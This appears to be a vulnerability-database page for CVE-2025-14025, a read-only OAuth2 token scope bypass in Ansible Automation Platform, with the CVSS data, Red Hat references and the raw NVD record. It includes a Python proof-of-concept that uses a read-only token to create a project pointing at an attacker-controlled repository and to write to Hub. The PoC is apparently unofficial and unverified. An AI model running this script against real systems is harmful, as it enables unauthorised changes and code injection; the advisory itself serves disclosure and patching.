Security Vulnerability Report
中文
CVE-2025-14025 CVSS 8.5 HIGH

CVE-2025-14025

Published: 2026-01-08 14:15:57
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API Tokens in AAP, are enforced at the Gateway level for Gateway-specific operations. However, this vulnerability allows read-only tokens to perform write operations on backend services (e.g., Controller, Hub, EDA). If this flaw were exploited, an attacker‘s capabilities would only be limited by role based access controls (RBAC).

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ansible Automation Platform < 2.4 (未修补版本)
Red Hat建议关注RHSA-2026:0360、RHSA-2026:0361、RHSA-2026:0408、RHSA-2026:0409安全公告获取具体版本信息

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14025 PoC - Read-only Token Privilege Bypass # This PoC demonstrates how a read-only OAuth2 token can perform write operations import requests import json # Configuration AAP_GATEWAY_URL = "https://your-aap-gateway.example.com" READ_ONLY_TOKEN = "your_read_only_oauth2_token" # Headers with read-only token headers = { "Authorization": f"Bearer {READ_ONLY_TOKEN}", "Content-Type": "application/json" } print("[*] Testing CVE-2025-14025: Read-only Token Privilege Bypass") print(f"[*] Gateway URL: {AAP_GATEWAY_URL}") # Step 1: Verify token has read-only scope print("\n[1] Checking token scopes...") verify_response = requests.get( f"{AAP_GATEWAY_URL}/api/gateway/v2/tokens/me/", headers=headers ) if verify_response.status_code == 200: token_info = verify_response.json() print(f"[+] Token scope: {token_info.get('scope', 'N/A')}") # Step 2: Attempt write operation on Controller (should be blocked but isn't) print("\n[2] Attempting write operation on Automation Controller...") write_payload = { "name": "malicious_project", "description": "Created via privilege bypass", "organization": 1, "scm_type": "git", "scm_url": "https://github.com/attacker/repo" } # This request should be blocked by read-only token but exploits the vulnerability write_response = requests.post( f"{AAP_GATEWAY_URL}/api/controller/v2/projects/", headers=headers, json=write_payload ) if write_response.status_code in [200, 201]: print("[!] VULNERABLE: Write operation succeeded with read-only token!") print(f"[+] Created project: {write_response.json().get('name')}") else: print(f"[-] Request blocked: {write_response.status_code}") # Step 3: Attempt modification on Hub print("\n[3] Attempting write operation on Automation Hub...") hub_payload = { "name": "malicious_collection", "namespace": "attacker" } hub_response = requests.post( f"{AAP_GATEWAY_URL}/api/galaxy/content/", headers=headers, json=hub_payload ) if hub_response.status_code in [200, 201]: print("[!] VULNERABLE: Hub write operation succeeded!") else: print(f"[-] Request blocked: {hub_response.status_code}") print("\n[*] PoC completed. If vulnerable, read-only tokens can perform write operations.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14025", "sourceIdentifier": "[email protected]", "published": "2026-01-08T14:15:56.510", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API Tokens in AAP, are enforced at the Gateway level for Gateway-specific operations. However, this vulnerability allows read-only tokens to perform write operations on backend services (e.g., Controller, Hub, EDA). If this flaw were exploited, an attacker‘s capabilities would only be limited by role based access controls (RBAC)."}, {"lang": "es", "value": "Se encontró una falla en Ansible Automation Platform (AAP). Los tokens de API OAuth2 con alcance de solo lectura en AAP se aplican a nivel de Gateway para operaciones específicas del Gateway. Sin embargo, esta vulnerabilidad permite que los tokens de solo lectura realicen operaciones de escritura en servicios de backend (por ejemplo, Controller, Hub, EDA). Si esta falla fuera explotada, las capacidades de un atacante solo estarían limitadas por los controles de acceso basados en roles (RBAC)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-279"}]}], "references": [{"url": "https://access.redhat.com/articles/7136004", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0360", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0361", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0408", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0409", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14025", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418785", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.